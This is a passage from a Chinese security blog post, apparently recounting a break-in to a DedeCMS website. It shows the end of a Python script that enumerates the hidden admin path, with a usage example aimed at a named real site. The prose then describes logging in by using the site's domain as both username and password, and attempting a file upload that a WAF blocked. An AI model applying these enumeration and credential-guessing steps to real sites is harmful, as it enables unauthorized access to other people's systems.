back_dir</span><br><span class="line"></span><br><span class="line">            print(show_message)</span><br><span class="line">            return show_message</span><br><span class="line">        else:</span><br><span class="line">            check_message[&#39;Enumerate&#39;] &#x3D; False</span><br><span class="line">            print(check_message)</span><br><span class="line">            return check_message</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main(url):</span><br><span class="line">    N &#x3D; Bute_Login(url)</span><br><span class="line">    N.Bute()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line">usage:        python .\dede_login.py -u [url]http:&#x2F;&#x2F;www.chuheautism.com[&#x2F;url]</span><br><span class="line">output:</span><br><span class="line">                (&#39;testing&#39;, &#39;a&#39;)</span><br><span class="line">                (&#39;testing&#39;, &#39;b&#39;)</span><br><span class="line">                (&#39;testing&#39;, &#39;c&#39;)</span><br><span class="line">                &#123;&#39;Login_url&#39;: &#39;http:&#x2F;&#x2F;www.chuheautism.com&#x2F;cha&#39;&#125;</span><br><span class="line"></span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &#39;__main__&#39;:</span><br><span class="line">    if sys.argv[1] &#x3D;&#x3D; &quot;-u&quot;:</span><br><span class="line">        main(sys.argv[2])</span><br></pre></td></tr></table></figure>

<p>python环境为3.6，运行脚本：python dedecms.py -u url</p>
<p>跑的有点久，不过后台路径还是跑出来了，结果如图：</p>
<p><img src="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/04.jpg" alt="图4"></p>
<p>尝试了一些弱口令，无果，一些网站后台会使用该网站的域名当做用户和密码，将当前网站域名当做用户名和密码，直接登录进来。</p>
<p><img src="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/05.jpg" alt="图5"></p>
<p>注：当前模板dedecms有修改过的，试了一些网上爆出的漏洞都无法利用，尝试后台上传文件，结果有waf存在，无法上传，就不描述了。</p>

      
    </div>
    <div class="article-footer">
      
    </div>
  </article>
  
    
  <section id="comments">
  	
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2021/06/17/webpack%E5%8F%8D%E7%BC%96%E8%AF%91/" title="webpack反编译"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2021/05/04/web/%E7%8C%9C%E6%B5%8B%E9%9A%90%E8%97%8F%E5%8F%82%E6%95%B0%E4%B9%8B%E8%B6%8A%E6%9D%83/" title="猜测隐藏参数之越权"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/noevery" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        &copy; 2022 John Doe
        
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   


<!-- custom analytics part create by xiamo -->
<script defer src="https://cdn1.lncld.net/static/js/av-min-1.2.1.js"></script>
<script defer>
AV.init({
  appId: '',
  appKey: ''
});

function showTime(Counter) {
	var query = new AV.Query(Counter);
		var visitors= $('.leancloud_visitors');
		query.greaterThanOrEqualTo("time", 0);		
		query.find({
			success: function(results) {
				if (results.length == 0) {				
					return;
				}
				var data = results;
				visitors.each(function(){
					var url = $(this).attr('id').trim();					
					for (var i = 0; i < data.length; i++) {
						var object = data[i];
						var content = object.get('time');
						var _url = object.get('url')
						if(url == _url){
							$(this).text(content);
						}
					}
				})
				
			},
			error: function(object, error) {
				console.log("Error: " + error.code + " " + error.message);
			}
		});
}

function addCount(Counter) {
	var Counter = AV.Object.extend("Counter");
	url = $(".leancloud_visitors").attr('id').trim();
	title = $(".leancloud_visitors").attr('data-flag-title').trim();
	var query = new AV.Query(Counter);
	query.equalTo("url", url);
	query.find({
		success: function(results) {
			if (results.length > 0) {
				var counter = results[0];
				counter.fetchWhenSave(true);
				counter.increment("time");
				counter.save(null, {
					success: function(counter) {
						var content = counter.get('time');
						$(document.getElementById(url)).text(content);
					},
					error: function(counter, error) {
						console.log('Failed to save Visitor num, with error message: ' + error.message);
					}
				});
			} else {
				var newcounter = new Counter();
				newcounter.set("title", title);
				newcounter.set("url", url);
				newcounter.set("time", 1);
				newcounter.save(null, {
					success: function(newcounter) {
					    console.log("newcounter.get('time')="+newcounter.get('time'));
						var content = newcounter.get('time');
						$(document.getElementById(url)).text(content);
					},
					error: function(newcounter, error) {
						console.log('Failed to create');
					}
				});
			}
		},
		error: function(error) {
			console.log('Error:' + error.code + " " + error.message);
		}
	});
}
$(function() {
	var Counter = AV.Object.extend("Counter");
	if ($('.leancloud_visitors').length == 1) {
		addCount(Counter);
	} else {
		showTime(Counter);
	}
}); 
</script>



   






</body>
</html>